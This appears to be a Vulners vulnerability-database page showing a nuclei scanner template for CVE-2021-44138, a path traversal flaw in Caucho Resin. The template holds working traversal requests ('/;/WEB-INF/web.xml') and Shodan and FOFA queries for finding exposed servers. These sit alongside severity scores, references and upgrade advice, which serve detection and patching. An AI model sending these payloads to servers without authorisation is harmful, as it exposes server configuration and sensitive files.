Lucene search
+L

Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal

🗓️ 01 Aug 2026 10:03:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 89 Views

Caucho Resin <=4.0.56 - Remote File Read Vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2021-44138
4 Apr 202213:15
attackerkb
circl
Circl
CVE-2021-44138
4 Apr 202216:27
circl
cnnvd
CNNVD
Caucho Resin 路径遍历漏洞
4 Apr 202200:00
cnnvd
cve
CVE
CVE-2021-44138
4 Apr 202212:03
cve
cvelist
Cvelist
CVE-2021-44138
4 Apr 202212:03
cvelist
github
Github Security Blog
Path Traversal in Caucho Resin
5 Apr 202200:00
github
nvd
NVD
CVE-2021-44138
4 Apr 202213:15
nvd
openvas
OpenVAS
'/;/WEB-INF/' Information Disclosure Vulnerability (HTTP)
6 Oct 202100:00
openvas
openvas
OpenVAS
Caucho Resin 4.0.52 - 4.0.56 Path Traversal Vulnerability - Active Check
15 Jun 202300:00
openvas
osv
OSV
CVE-2021-44138
4 Apr 202213:15
osv
Rows per page
id: CVE-2021-44138

info:
  name: Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal
  author: carrot2
  severity: high
  description: |
    There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive data exposure.
  remediation: |
    Upgrade Caucho Resin to a version higher than 4.0.56 to mitigate the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2021-44138
    - https://github.com/maybe-why-not/reponame/issues/2
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-44138
    cwe-id: CWE-22
    epss-score: 0.14115
    epss-percentile: 0.96196
    cpe: cpe:2.3:a:caucho:resin:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: caucho
    product: resin
    shodan-query:
      - html:"Resin"
      - http.html:"resin"
      - cpe:"cpe:2.3:a:caucho:resin"
    fofa-query: body="resin"
  tags: cve2021,cve,resin,caucho,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/;/WEB-INF/web.xml"
      - "{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<web-app"
          - "</web-app>"
        condition: and

      - type: word
        part: header
        words:
          - "text/xml"
          - "application/xml"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210083ab852214d581ed6be5b75f9e876c1936148c6bf4f745927540aa658f009a5d022008706e97750456c659bfb5a57032f4c8c3fab13ac78c5f86349ec07ff0f5d2de:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 25
CVSS 3.17.5
EPSS0.14115
89